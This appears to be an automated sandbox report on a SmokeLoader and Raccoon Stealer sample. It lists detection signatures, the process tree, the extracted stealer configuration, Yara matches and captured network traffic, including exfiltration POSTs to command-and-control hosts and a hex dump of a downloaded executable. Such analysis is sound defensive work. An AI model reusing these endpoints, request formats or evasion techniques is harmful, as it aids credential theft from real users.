Play interactive tour

Edit tour

Analysis Report y98WYYcJ2U.exe

Overview

General Information

Sample Name:	y98WYYcJ2U.exe
Analysis ID:	56087
MD5:	18b04e2fd804d553d9a35e088193dea7
SHA1:	f3dfec27d03905211940da451e9ee1ed500abf33
SHA256:	34dea8fb86e0f4d24ce31fb3d0b87d70feea93e48d3e74a3347001ad590f9b43
Most interesting Screenshot:

Detection

Raccoon SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Raccoon Stealer

Yara detected SmokeLoader

Allocates memory in foreign processes

Binary contains a suspicious time stamp

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Contains functionality to inject code into remote processes

Contains functionality to steal Internet Explorer form passwords

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Found many strings related to Crypto-Wallets (likely being stolen)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Renames NTDLL to bypass HIPS

Tries to detect Sandboxie (via GetModuleHandle check)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file access)

Writes to foreign memory regions

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file does not import any functions

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64_hvm

y98WYYcJ2U.exe (PID: 5008 cmdline: 'C:\Users\user\Desktop\y98WYYcJ2U.exe' MD5: 18B04E2FD804D553D9A35E088193DEA7)

explorer.exe (PID: 2460 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)

3BD3.exe (PID: 4680 cmdline: C:\Users\user\AppData\Local\Temp\3BD3.exe MD5: 8576CCC1310EA39D4AC4B642C7700F91)

cmd.exe (PID: 4440 cmdline: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\AppData\Local\Temp\3BD3.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 2392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 4856 cmdline: timeout /T 10 /NOBREAK MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

48F3.exe (PID: 1300 cmdline: C:\Users\user\AppData\Local\Temp\48F3.exe MD5: 1C886F74C9051CE8BE91FEC2083744F2)

msiexec.exe (PID: 2732 cmdline: msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

cwfbibg (PID: 4600 cmdline: C:\Users\user\AppData\Roaming\cwfbibg MD5: 18B04E2FD804D553D9A35E088193DEA7)

cleanup

Malware Configuration

Threatname: Raccoon Stealer

{"Config: ": ["00000000 -> [Raccoon Stealer] - v1.5.13-af-hotfix Release", "Build compiled on Mon Jul  6 14:33:03 2020", "Launched at: 2020.09.14 - 03:55:16 GMT", "Bot_ID: 717E1B34-6140-4FC8-B497-B7800CAA7E40_user", "Running on a desktop", "=R=A=C=C=O=O=N=", "- Cookies: 8", "- Passwords: 0", "- Files: 0", "System Information:", "- System Language: English", "- System TimeZone: -8 hrs", "- IP: 91.132.136.206", "- Location: 47.392502, 8.454600 | Zurich, Zurich, Switzerland (8010)", "- ComputerName: 528110", "- Username: user", "- Windows version: NT 10.0", "- Product name: Windows 10 Pro", "- System arch: x64", "- CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (4 cores)", "- RAM: 8191 MB (6822 MB used)", "- Screen resolution: 1280x1024", "- Display devices:", "0) Microsoft Basic Display Adapter", "============", "Installed Apps:", "Adobe Acrobat Reader DC (18.011.20055)", "Google Chrome (67.0.3396.99)", "Google Update Helper (1.3.33.17)", "Java 8 Update 171 (8.0.1710.11)", "Java Auto Updater (2.8.171.11)", "Mozilla Firefox 72.0.2 (x86 en-US) (72.0.2)", "============"]}

Yara Overview

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\LocalLow\machineinfo.txt	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\breakpadinjector.dll	ConventionEngine_Keyword_Inject	Searching for PE files with PDB path keywords, terms or anomalies.	@stvemillertime	0x17c37:$anchor: inject 0x17c48:$anchor: inject 0x1858a:$anchor: inject 0x19ab8:$anchor: inject 0x17bdc:$pcre: RSDS\x1A\x11\x81\x9AP)\x9AN\x9D\xCF\xA9p\x11yx\x99\x01z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb
C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy_InUse.dll	ConventionEngine_Keyword_Hook	Searching for PE files with PDB path keywords, terms or anomalies.	@stvemillertime	0x1b30:$anchor: hook 0x1ad4:$pcre: RSDS\xA5\x85+s\x15\x1BsI\x8B_\x8A\x16\xA0\x81:$\x01z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb
C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy_InUse.dll	ConventionEngine_Keyword_Proxy	Searching for PE files with PDB path keywords, terms or anomalies.	@stvemillertime	0x1b3f:$anchor: Proxy 0x1e8e:$anchor: Proxy 0x1ee3:$anchor: Proxy 0x2094:$anchor: Proxy 0x20ac:$anchor: Proxy 0x21de:$anchor: Proxy 0x21f6:$anchor: Proxy 0x220f:$anchor: Proxy 0x295a:$anchor: Proxy 0x2ba8:$anchor: Proxy 0x1ad4:$pcre: RSDS\xA5\x85+s\x15\x1BsI\x8B_\x8A\x16\xA0\x81:$\x01z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb
C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy.dll	ConventionEngine_Keyword_Hook	Searching for PE files with PDB path keywords, terms or anomalies.	@stvemillertime	0x1b30:$anchor: hook 0x1ad4:$pcre: RSDS\xA5\x85+s\x15\x1BsI\x8B_\x8A\x16\xA0\x81:$\x01z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb
C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy.dll	ConventionEngine_Keyword_Proxy	Searching for PE files with PDB path keywords, terms or anomalies.	@stvemillertime	0x1b3f:$anchor: Proxy 0x1e8e:$anchor: Proxy 0x1ee3:$anchor: Proxy 0x2094:$anchor: Proxy 0x20ac:$anchor: Proxy 0x21de:$anchor: Proxy 0x21f6:$anchor: Proxy 0x220f:$anchor: Proxy 0x295a:$anchor: Proxy 0x2ba8:$anchor: Proxy 0x1ad4:$pcre: RSDS\xA5\x85+s\x15\x1BsI\x8B_\x8A\x16\xA0\x81:$\x01z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1330007715.0000000000400000.00000040.00020000.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
00000000.00000003.1267461020.00000000001E0000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
00000003.00000002.1451110742.0000000000400000.00000040.00020000.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
00000003.00000003.1428267644.00000000001F0000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
00000004.00000003.1518715900.000000004B3BE000.00000004.00000001.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
Process Memory Space: 3BD3.exe PID: 4680	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.y98WYYcJ2U.exe.400000.0.raw.unpack	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
0.2.y98WYYcJ2U.exe.400000.0.unpack	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
0.3.y98WYYcJ2U.exe.1e0000.0.raw.unpack	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
3.2.cwfbibg.400000.0.raw.unpack	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
3.2.cwfbibg.400000.0.unpack	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
3.3.cwfbibg.1f0000.0.raw.unpack	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: machineinfo.txt.4.dr.binstr

Malware Configuration Extractor: Raccoon Stealer {"Config: ": ["00000000 -> [Raccoon Stealer] - v1.5.13-af-hotfix Release", "Build compiled on Mon Jul 6 14:33:03 2020", "Launched at: 2020.09.14 - 03:55:16 GMT", "Bot_ID: 717E1B34-6140-4FC8-B497-B7800CAA7E40_user", "Running on a desktop", "=R=A=C=C=O=O=N=", "- Cookies: 8", "- Passwords: 0", "- Files: 0", "System Information:", "- System Language: English", "- System TimeZone: -8 hrs", "- IP: 91.132.136.206", "- Location: 47.392502, 8.454600 | Zurich, Zurich, Switzerland (8010)", "- ComputerName: 528110", "- Username: user", "- Windows version: NT 10.0", "- Product name: Windows 10 Pro", "- System arch: x64", "- CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (4 cores)", "- RAM: 8191 MB (6822 MB used)", "- Screen resolution: 1280x1024", "- Display devices:", "0) Microsoft Basic Display Adapter", "============", "Installed Apps:", "Adobe Acrobat Reader DC (18.011.20055)", "Google Chrome (67.0.3396.99)", "Google Update Helper (1.3.33.17)", "Java 8 Update 171 (8.0.1710.11)", "Java Auto Updater (2.8.171.11)", "Mozilla Firefox 72.0.2 (x86 en-US) (72.0.2)", "============"]}

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000003.1518715900.000000004B3BE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3BD3.exe PID: 4680, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\LocalLow\machineinfo.txt, type: DROPPED

Machine Learning detection for sample

Show sources

Source: y98WYYcJ2U.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_0040A5D7 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,	4_2_0040A5D7
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_00423030 CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,	4_2_00423030
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_00423203 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree,	4_2_00423203
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_004094E8 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,	4_2_004094E8
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_0040B586 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,	4_2_0040B586
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_00409BD7 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,	4_2_00409BD7
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_0041A0CC __EH_prolog,_strlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,PK11_FreeSlot,	4_2_0041A0CC
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_00408F24 __EH_prolog,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,LocalAlloc,BCryptDecrypt,BCryptCloseAlgorithmProvider,BCryptDestroyKey,	4_2_00408F24
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_00433A25 lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlenA,	4_2_00433A25

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_0043DD11 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,	4_2_0043DD11
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_0045F48D FindFirstFileExW,	4_2_0045F48D
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_0043DD31 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,	4_2_0043DD31
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_0043DE7C GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,	4_2_0043DE7C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_0267A650 GetVersionExW,FindFirstFileW,FindNextFileW,	9_2_0267A650

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe

Code function: 4_2_00434B68 __EH_prolog,GetLogicalDriveStringsA,

4_2_00434B68

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\storage\default\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\storage\default\moz-extension+++6cdaceb3-9468-4921-a80e-869192f558cd^userContextId=4294967295\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\storage\default\about+newtab\idb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\storage\default\moz-extension+++6cdaceb3-9468-4921-a80e-869192f558cd^userContextId=4294967295\idb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\storage\default\about+newtab\	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then movzx esi, word ptr [edi]	5_2_004178C0
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then mov edi, dword ptr [ebp+14h]	5_2_0040E8B0
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then push 60303581h	5_2_004071B0
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then movzx eax, word ptr [esi]	5_2_0040D240
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then movzx ebx, word ptr [edi]	5_2_00414240
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then movsx eax, byte ptr [edi]	5_2_00409220
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then push 00000000h	5_2_00402300
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then movsx ebx, byte ptr [esi]	5_2_00401300
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then add esi, 02h	5_2_004033E0
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then mov dword ptr [eax+ecx*4], 00000000h	5_2_00417460
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then mov byte ptr [ebp+edi-4Ch], bl	5_2_00405540
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then push FFFFFFFFh	5_2_00402500
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then movzx eax, word ptr [ebx+edi*2]	5_2_00406EA0
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then push ebp	5_2_001E905F
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then movzx eax, word ptr [ebx+edi*2]	5_2_001D70F0
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then movzx esi, word ptr [edi]	5_2_001E7B10
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then mov edi, dword ptr [ebp+14h]	5_2_001DEB00
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then push 60303581h	5_2_001D7400
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then movsx eax, byte ptr [edi]	5_2_001D9470
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then movsx eax, byte ptr [edi]	5_2_001D9468
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then movzx eax, word ptr [esi]	5_2_001DD490
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then movzx ebx, word ptr [edi]	5_2_001E4490
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then movsx ebx, byte ptr [esi]	5_2_001D1550
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then push 00000000h	5_2_001D2550
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then add esi, 02h	5_2_001D3630
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then mov dword ptr [eax+ecx*4], 00000000h	5_2_001E76B0
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then push FFFFFFFFh	5_2_001D2750
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 4x nop then mov byte ptr [ebp+edi-4Ch], bl	5_2_001D5790
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx eax, word ptr [esi]	9_2_0266D240
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx ebx, word ptr [edi]	9_2_02674240
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movsx eax, byte ptr [edi]	9_2_02669220
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then push 00000000h	9_2_02662300
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movsx ebx, byte ptr [esi]	9_2_02661300
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then add esi, 02h	9_2_026633E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx esi, word ptr [edi]	9_2_026778C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov edi, dword ptr [ebp+14h]	9_2_0266E8B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then push 60303581h	9_2_026671B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx eax, word ptr [ebx+edi*2]	9_2_02666EA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov dword ptr [eax+ecx*4], 00000000h	9_2_02677460
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov byte ptr [ebp+edi-4Ch], bl	9_2_02665540
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then push FFFFFFFFh	9_2_02662500

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2018316 ET TROJAN Zeus GameOver Possible DGA NXDOMAIN Responses 8.8.8.8:53 -> 192.168.2.3:60913

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 13 Sep 2020 18:55:06 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: closeLast-Modified: Mon, 18 Mar 2019 19:52:10 GMTETag: "5c8ff6ea-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c 00 0

Source: global traffic	HTTP traffic detected: POST /gate/log.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 155Host: chinadevmonster.top
Source: global traffic	HTTP traffic detected: POST /file_handler4/file.php?hash=29a48d36455677adfa3fd9866445462d19dfa596&js=c2192b8881e9e86fdae59338948668354bcd5e2d&callback=http://chinadevmonster.top/gate HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=4k683b59nd0j798043458nContent-Length: 2211Host: chinadevmonster.top

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://2831ujedkdajsdj.info/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: 2831ujedkdajsdj.info
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://2831ujedkdajsdj.info/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: 2831ujedkdajsdj.info
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://2831ujedkdajsdj.info/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: 2831ujedkdajsdj.info
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://2831ujedkdajsdj.info/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 144Host: 2831ujedkdajsdj.info
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://2831ujedkdajsdj.info/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: 2831ujedkdajsdj.info
Source: global traffic	HTTP traffic detected: GET /gate/sqlite3.dll HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: chinadevmonster.topConnection: Keep-Alive
